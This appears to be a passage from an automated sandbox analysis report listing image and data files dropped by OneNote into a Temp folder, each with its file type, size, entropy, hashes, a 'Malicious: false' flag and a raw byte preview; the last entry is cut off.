MD5:	9029D589CB98247DEE5834E649F66AC5
SHA1:	C227B46BC48D628990CB85D6E00C61159DEE6F6B
SHA-256:	69A0DF229049C56A7699B73E8E1698D2B37C2FF766CEE3BB7DE09B3F635FD9C0
SHA-512:	0C6BC5099BEF4ACF16978D472F4EC0FEA3E631E7EA7D615596CC0DC6EA404A745A380248F64A9DD5EB846F79FB730DD82E4F807B6B4985233B77E925FF93B1E0
Malicious:	false
Preview:	./.C..vL....W"v_$0...Y.J.>;K...f................?.....I...............................................................................................................h..............................................F..sE...H...V........D"..N.)B.&..K................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C1C89936-26A8-4E1C-A7AC-5687CC2AEA47}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{C6A33E07-5031-4A1F-8033-CF0D738268D9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{C6FC7F0F-BBCF-4E7A-A1D7-FCEE4E295C9C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C9856812-9DB7-4DCE-98D8-F1E691EE24D9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{CCE0EE01-96DC-4110-B66E-32299DE74136}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Temp\{D128F68D-6717-4A01-AC38-542A455AF322}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{D29A4C00-BC62-4427-8C15-67FF8B6FA9F4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{D32574EA-C5D2-473A-AA80-DCC54AF9CF7E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
Category:	dropped
Size (bytes):	129887
Entropy (8bit):	7.8877849553452695
Encrypted:	false
SSDEEP:	3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
MD5:	737E96E41D79D3BDACE7AB4F8CBF6274
SHA1:	E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
SHA-256:	7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
SHA-512:	D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
Malicious:	false
Preview:	......JFIF.....H.H.....iExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:......a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

C:\Users\user\AppData\Local\Temp\{D78FE0F4-22AA-4505-9900-E1288C2F9F81}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{DDCC37B9-185C-4609-B582-1122F5AA072E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Temp\{E209BBFA-1551-44DF-ACA4-4E6CB1458BE4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Temp\{E2CEA15A-F527-4711-B55E-D3A9974FEA3A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Temp\{E311ABAB-7F28-411C-9536-CAF4538182BF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Temp\{E41FD04B-ACFB-4ED7-9D52-0CA106BC83B2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6421289417512828
Encrypted:	false
SSDEEP:	12:RapjVYyf9/UfoXQQDYQxv2ZQx5Wf/xZQxx:YpxYyfSAQQkQxuZQx5GZQxx
MD5:	4759EDF63C077B12F1CCF271D60900A3
SHA1:	BD54C8DCC6D14E4B5219E91E9E3E3803EA97B21C
SHA-256:	092AF77B7A699C3C5F0912CDC3D09E3F0A2D95ABC153915DFAFFB559C85D6828
SHA-512:	BD84D48803D26B07C115AE09C4E9894D96AAB441FB263CB64EA57760E02DAF39A84505870AE94333BA2B88F09E6095F2FC9E1F010A2A00496765FB6CAF5579CC
Malicious:	false
Preview:	./.C..vL....W"v_...L..uD.PF7M.~{................?.....I...............................................................................................................h.............................................i.` G..O.................::HK...M...X.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{EA04BAE9-EB69-47ED-BC8A-D70BFDF83981}.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Temp\{EBED3007-CAB5-487E-BD1F-45ED1B323B8C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Temp\{ECABBE01-4AEA-45CD-A9AB-BC0F7EDFEA21}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
